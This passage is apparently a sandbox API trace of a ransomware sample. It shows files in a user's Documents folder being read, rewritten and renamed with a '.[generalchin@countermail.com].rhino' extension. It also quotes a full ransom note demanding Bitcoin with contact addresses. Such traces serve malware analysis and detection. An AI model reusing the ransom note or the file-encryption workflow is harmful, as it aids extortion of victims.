| out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757eb0 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ec8 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x713060 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757eb0 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x23bb080 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713060 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711c30 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb080 | out: hHeap=0x6d0000) returned 1 [0106.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0106.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711c30 | out: hHeap=0x6d0000) returned 1 [0106.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef918 [0106.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0106.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x712a20 [0106.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef918 | out: hHeap=0x6d0000) returned 1 [0106.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714e58 [0106.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712a20 | out: hHeap=0x6d0000) returned 1 [0106.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x714f38 [0106.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x715080 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714f38 | out: hHeap=0x6d0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x715268 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x715538 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715268 | out: hHeap=0x6d0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x714e58 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715538 | out: hHeap=0x6d0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7154a0 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x715e08 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7154a0 | out: hHeap=0x6d0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x716c20 [0106.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715e08 | out: hHeap=0x6d0000) returned 1 [0106.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x718160 [0106.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x716c20 | out: hHeap=0x6d0000) returned 1 [0106.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x714e58 [0106.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718160 | out: hHeap=0x6d0000) returned 1 [0106.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23fb070 [0106.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b2088 [0106.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23fb070 | out: hHeap=0x6d0000) returned 1 [0106.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x24c0050 [0106.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.765] WriteFile (in: hFile=0x110, lpBuffer=0x24c0060*, nNumberOfBytesToWrite=0x9aac, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24c0060*, lpNumberOfBytesWritten=0x292f304*=0x9aac, lpOverlapped=0x0) returned 1 [0106.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0106.766] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9aac, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.766] CloseHandle (hObject=0x110) returned 1 [0106.767] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9c08 [0106.767] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x714e58 [0106.767] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9c08 | out: hHeap=0x6d0000) returned 1 [0106.768] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\zIJ9l4vUg8q7Ye0AeiB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\zij9l4vug8q7ye0aeib.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\zIJ9l4vUg8q7Ye0AeiB.csv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\zij9l4vug8q7ye0aeib.csv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0106.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0106.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\K2SQa33U.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\k2sqa33u.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.869] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x18189 [0106.869] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x182a9, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.869] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.869] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.871] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.871] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x18189, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x18189, lpOverlapped=0x0) returned 1 [0106.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0106.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0106.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0106.873] GetLastError () returned 0x0 [0106.873] SetLastError (dwErrCode=0x0) [0106.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x181ac) returned 0x24c0050 [0106.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0106.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0106.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.878] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0106.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0106.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0106.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f70 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0106.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23ff070 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23ff070 [0106.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b2088 [0106.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0106.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b4050 [0106.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0106.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b4050 | out: hHeap=0x6d0000) returned 1 [0106.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b2088 [0106.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0106.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x24d8208 [0106.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24e2238 [0106.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24d8208 | out: hHeap=0x6d0000) returned 1 [0106.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24f1270 [0106.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24e2238 | out: hHeap=0x6d0000) returned 1 [0106.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x23ff070 [0106.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24f1270 | out: hHeap=0x6d0000) returned 1 [0106.890] WriteFile (in: hFile=0x110, lpBuffer=0x23ff080*, nNumberOfBytesToWrite=0x182a9, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23ff080*, lpNumberOfBytesWritten=0x292f304*=0x182a9, lpOverlapped=0x0) returned 1 [0106.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0106.896] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x182a9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.896] CloseHandle (hObject=0x110) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7148e0 [0106.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x714978 [0106.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.898] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\K2SQa33U.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\k2sqa33u.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\K2SQa33U.pptx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\k2sqa33u.pptx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0106.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0106.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79feb8 [0106.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79ff30 [0106.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x712898 [0106.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79ff30 | out: hHeap=0x6d0000) returned 1 [0106.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.902] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0106.902] WriteFile (in: hFile=0x110, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0106.903] CloseHandle (hObject=0x110) returned 1 [0106.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\MY5h2w Zql7liGw mDEf.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\my5h2w zql7ligw mdef.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.903] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x2ffc [0106.903] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x311c, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.904] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.904] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.905] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.919] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x2ffc, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x2ffc, lpOverlapped=0x0) returned 1 [0106.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0106.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0106.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0106.919] GetLastError () returned 0x0 [0106.919] SetLastError (dwErrCode=0x0) [0106.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x301f) returned 0x23b2088 [0106.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0106.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0106.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.920] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0106.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0106.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0106.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f70 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0106.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0106.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0106.921] 